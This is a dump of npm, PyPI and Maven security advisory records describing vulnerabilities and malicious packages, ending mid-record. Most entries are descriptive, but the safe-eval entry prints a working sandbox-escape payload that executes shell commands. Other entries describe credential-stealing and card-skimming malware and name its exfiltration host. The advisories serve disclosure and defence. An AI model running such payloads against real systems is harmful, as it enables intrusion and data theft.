+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'zwserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16149'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/zwserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/372'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:20:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4hq8-v42x-9wx3,2021-10-01T20:56:40Z,2020-09-04T16:51:52Z,,[],Malicious Package in bs85check,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bs85check'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1379'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j5jc-jf8f-86q7,2023-07-27T20:34:44Z,2020-09-01T20:38:30Z,,[],Malicious Package in dictum.js,"Version 1.0.5 of `dictum.js` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.5 of this module is found installed you will want to replace it with a version before or after 1.0.5. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.4",[],"[{'package': {'ecosystem': 'npm', 'name': 'dictum.js'}, 'versions': ['1.0.5']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/640'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9pcf-h8q9-63f6,2020-08-31T18:44:49Z,2020-09-03T17:12:41Z,,[],Sandbox Breakout / Arbitrary Code Execution in safe-eval,"All versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.
+
+For example, the payload
+```
+((() => {
+const targetKey = Object.keys(this)[0];
+Object.defineProperty(this, targetKey, {
+get: function() {
+return arguments.callee.caller.constructor(
+""return global.process.mainModule.require('child_process').execSync('pwd').toString()""
+)();
+}
+});
+})();```
+may be used to print the `pwd` to the console.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'safe-eval'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1033'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p62r-jf56-h429,2020-08-31T18:49:31Z,2020-09-03T20:29:58Z,,[],Malicious Package in evil-package,"All versions of `evil-package` contain malicious code. The package uploads the contents of `process.env` to `example.com/log`.
+
+
+## Recommendation
+
+Remove the package from your environment. Given the host where the information was uploaded to there is no further indication of compromise.",[],"[{'package': {'ecosystem': 'npm', 'name': 'evil-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1162'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f8jj-45fj-44r6,2021-09-30T17:13:39Z,2020-09-03T23:05:43Z,,[],Malicious Package in js-she3,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-she3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1287'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9p2w-rmx4-9mw7,2021-10-04T19:12:12Z,2020-09-04T16:54:02Z,,[],Command Injection in strapi,"Versions of `strapi` before 3.0.0-beta.17.8 are vulnerable to Command Injection. The package fails to sanitize plugin names in the `/admin/plugins/install/` route. This may allow an authenticated attacker with admin privileges to run arbitrary commands in the server.
+
+
+## Recommendation
+
+Upgrade to version 3.0.0-beta.17.8 or later",[],"[{'package': {'ecosystem': 'npm', 'name': 'strapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0-beta.17.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0-beta.17.7'}}]","[{'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1424'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x9gm-qxhh-rf75,2021-09-24T17:04:30Z,2020-09-01T19:51:28Z,,[],Malicious Package in cordova-plugin-china-picker,"Version 1.0.910 of `cordova-plugin-china-picker` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 1.0.910 of this module is found installed you will want to replace it with a version before or after 1.0.910. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cordova-plugin-china-picker'}, 'versions': ['1.0.910']}]","[{'type': 'PACKAGE', 'url': 'https://git.oschina.net/BlankTrack/ChinaPicker.git'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-x9gm-qxhh-rf75'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CORDOVAPLUGINCHINAPICKER-451001'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/622'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x6m6-5hrf-fh6r,2021-09-24T22:05:24Z,2020-09-01T21:26:50Z,,[],Denial of Service in markdown-it-toc-and-anchor,"All versions of `markdown-it-toc-and-anchor` are vulnerable to Denial of Service. Parsing markdown containing `**text**+\n@[toc]` causes the application to enter and infinite loop.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/'}]","[{'package': {'ecosystem': 'npm', 'name': 'markdown-it-toc-and-anchor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0'}]}]}]","[{'type': 'PACKAGE', 'url': 'https://github.com/medfreeman/markdown-it-toc-and-anchor'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MARKDOWNITTOCANDANCHOR-73500'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/749'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:34:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g8jc-mm3c-cwhj,2021-10-01T14:08:00Z,2020-09-02T20:31:06Z,,[],Malicious Package in reques,"All versions of `reques` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'reques'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/863'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:36Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r8hx-3qx6-hxq9,2021-10-01T20:59:17Z,2020-09-03T19:41:14Z,,[],Malicious Package in commandre,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'commandre'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1387'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ch82-gqh6-9xj9,2020-08-31T18:55:25Z,2020-09-04T15:13:19Z,,[],Prototype Pollution in get-setter,"All versions of `get-setter` are vulnerable to prototype pollution. The function `set` does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'get-setter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1332'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-724c-6vrf-99rq,2021-09-27T22:31:27Z,2020-09-02T21:49:48Z,,[],Sensitive Data Exposure in loopback,"Versions of `loopback` prior to 3.26.0 (3.x) and 2.42.0 (2.x) are vulnerable to Sensitive Data Exposure. Invalid API requests to the login endpoint may return information about the first user in the database. This can be used alongside other attacks for credential theft.
+
+
+## Recommendation
+
+If you're using `loopback` 3.x upgrade to version 3.26.0 or later.
+If you're using `loopback` 2.x upgrade to version 2.42.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'loopback'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.42.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.41.0'}}, {'package': {'ecosystem': 'npm', 'name': 'loopback'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.26.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.25.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/strongloop/loopback/issues/4195'}, {'type': 'PACKAGE', 'url': 'https://github.com/strongloop/loopback'}, {'type': 'WEB', 'url': 'https://loopback.io/doc/en/sec/Security-advisory-06-17-2019.html'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/915'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r4r9-mgjc-g6q3,2023-06-01T19:46:10Z,2020-09-01T19:06:15Z,,['CVE-2018-3727'],Path Traversal in 626,"All versions of `626` are vulnerable to path traversal. This enables a remote attacker to read arbitrary files from the remote server using this module.
+
+
+## Recommendation
+
+No fix is currently available for this vulnerability.
+It is our recommendation to not install or use this module at this time.
+ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '626'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-3727'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/311216'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:28:44Z', 'nvd_published_at': '2018-06-07T02:29:00Z'}"
+1.4.0,GHSA-jqjg-v355-hr9q,2021-09-29T21:12:22Z,2020-09-03T22:11:02Z,,[],Malicious Package in buffer-xop,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xop'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1250'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:22Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q3w9-g74q-vp5f,2020-08-31T18:51:13Z,2020-09-03T21:14:12Z,,[],Denial of Service in express-fileupload,"Versions of `express-fileupload` prior to 1.1.6-alpha.6 are vulnerable to Denial of Service. The package causes server responses to be delayed (up to 30s in internal testing) if the request contains a large `filename` of `.` characters.
+
+
+
+
+## Recommendation
+
+Upgrade to version 1.1.6-alpha.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'express-fileupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6-alpha.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'express-fileupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6-alpha.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.3-alpha.2'}}, {'package': {'ecosystem': 'npm', 'name': 'express-fileupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6-alpha.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.2-alpha.1'}}, {'package': {'ecosystem': 'npm', 'name': 'express-fileupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6-alpha.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.1-alpha.3'}}, {'package': {'ecosystem': 'npm', 'name': 'express-fileupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6-alpha.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-alpha.1'}}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1216'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rcv7-4w2m-gj9v,2021-10-01T16:15:09Z,2020-09-03T23:24:26Z,,[],Malicious Package in sj-tw-test-security,"All versions of `sj-tw-test-security` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sj-tw-test-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1308'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j6v9-xgvh-f796,2020-08-31T18:42:04Z,2020-09-11T21:11:34Z,,[],Command Injection in wxchangba,"All versions of `wxchangba` are vulnerable to Command Injection. The package does not validate user input on the `reqPostMaterial` function, passing contents of the `file` parameter to an exec call. This may allow attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'wxchangba'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/960'}]","{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:04Z', 'nvd_published_at': None}"
+1.4.0,GHSA-53mj-mc38-q894,2021-09-24T14:29:02Z,2020-09-01T19:40:41Z,,[],Remote Memory Exposure in openwhisk,"Versions of `openwhisk` before 3.3.1 are vulnerable to remote memory exposure.
+
+When a number is passed to `api_key`, affected versions of `openwhisk` allocate an uninitialized buffer and send that over network in Authorization header (base64-encoded).
+
+Proof of concept:
+
+```js
+var openwhisk = require('openwhisk');
+var options = {
+ apihost: '127.0.0.1:1433',
+ api_key: USERSUPPLIEDINPUT // number
+};
+var ow = openwhisk(options);
+ow.actions.invoke({actionName: 'sample'}).then(result => console.log(result))
+```
+
+
+## Recommendation
+
+Update to version 3.3.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'openwhisk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/openwhisk/openwhisk-client-js/pull/34'}, {'type': 'PACKAGE', 'url': 'https://github.com/openwhisk/openwhisk-client-js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/600'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:29:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fj93-7wm4-8x2g,2021-09-27T21:03:58Z,2020-09-02T21:22:47Z,,[],Cross-Site Scripting in jquery-mobile,"All version of `jquery-mobile` are vulnerable to Cross-Site Scripting. The package checks for content in `location.hash` and if a URL is found it does an XmlHttpRequest (XHR) to the URL and renders the response with `innerHTML`. It fails to validate the `Content-Type` of the response, allowing attackers to include malicious payloads as part of query parameters that are reflected back to the user. A response such as `{""q"":"""",""results"":[]}` would be parsed as HTML and the JavaScript payload executed.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'jquery-mobile'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jquery/jquery-mobile/issues/8640'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-mobile/pull/8649'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-mobile/pull/8650'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery-mobile/commit/b0d9cc758a48f13321750d7409fb7655dcdf2b50'}, {'type': 'WEB', 'url': 'https://gist.github.com/jupenur/e5d0c6f9b58aa81860bf74e010cf1685'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery-mobile/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JQUERYMOBILE-174599'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/883'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:39:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qj2g-642f-4jrv,2021-09-30T21:15:22Z,2020-09-02T21:17:30Z,,[],Malicious Package in carloprojectlesang,"All versions of `carloprojectlesang` contain obfuscated malware that uploads Discord user tokens to a remote server. This allows attackers to make purchases on behalf of users if they have credit cards linked to their Discord accounts.
+
+
+## Recommendation
+
+Remove the package from your environment. Review your Discord account access and rotate tokens if possible. If a credit card was linked to a compromised account contact your credit card company.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'carloprojectlesang'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/872'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f52g-6jhx-586p,2020-08-31T18:54:21Z,2020-09-03T23:20:12Z,,[],Denial of Service in handlebars,"Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service.
+
+
+## Recommendation
+
+Upgrade to version 4.4.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.5'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1300'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:21Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mgff-xpg3-3gwc,2021-10-01T20:57:02Z,2020-09-03T19:42:25Z,,[],Malicious Package in bsae-x,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bsae-x'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1380'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p59g-6cqr-m73w,2021-09-29T20:33:18Z,2020-09-03T20:45:27Z,,[],Malicious Package in bmap,"Version 1.0.3 of `bmap` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+## Recommendation
+
+If version 1.0.3 of this module is found installed you will want to replace it with a version before or after 1.0.3. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bmap'}, 'versions': ['1.0.3']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1192'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qc53-44cj-vfvx,2021-08-26T15:12:09Z,2020-09-25T18:28:30Z,,['CVE-2020-15197'],Denial of Service in Tensorflow,"### Impact
+The `SparseCountSparseOutput` implementation does not validate that the input arguments form a valid sparse tensor. In particular, there is no validation that the `indices` tensor has rank 2. This tensor must be a matrix because code assumes its elements are accessed as elements of a matrix:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L185
+
+However, malicious users can pass in tensors of different rank, resulting in a `CHECK` assertion failure and a crash. This can be used to cause denial of service in serving installations, if users are allowed to control the components of the input sparse tensor.
+
+### Patches
+We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release.
+
+We recommend users to upgrade to TensorFlow 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability is a variant of [GHSA-p5f8-gfw5-33w4](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qc53-44cj-vfvx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15197'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-20', 'CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:18:05Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-2qrg-x229-3v8q,2023-05-24T20:58:14Z,2020-01-06T18:43:49Z,,['CVE-2019-17571'],Deserialization of Untrusted Data in Log4j,"Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions 1.2 up to 1.2.17.
+
+Users are advised to migrate to `org.apache.logging.log4j:log4j-core`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'log4j:log4j'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2'}, {'last_affected': '1.2.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17571'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6@%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/564f03b4e9511fcba29c68fc0299372dadbdb002718fa8edcc4325e4@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c@%3Cissues.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 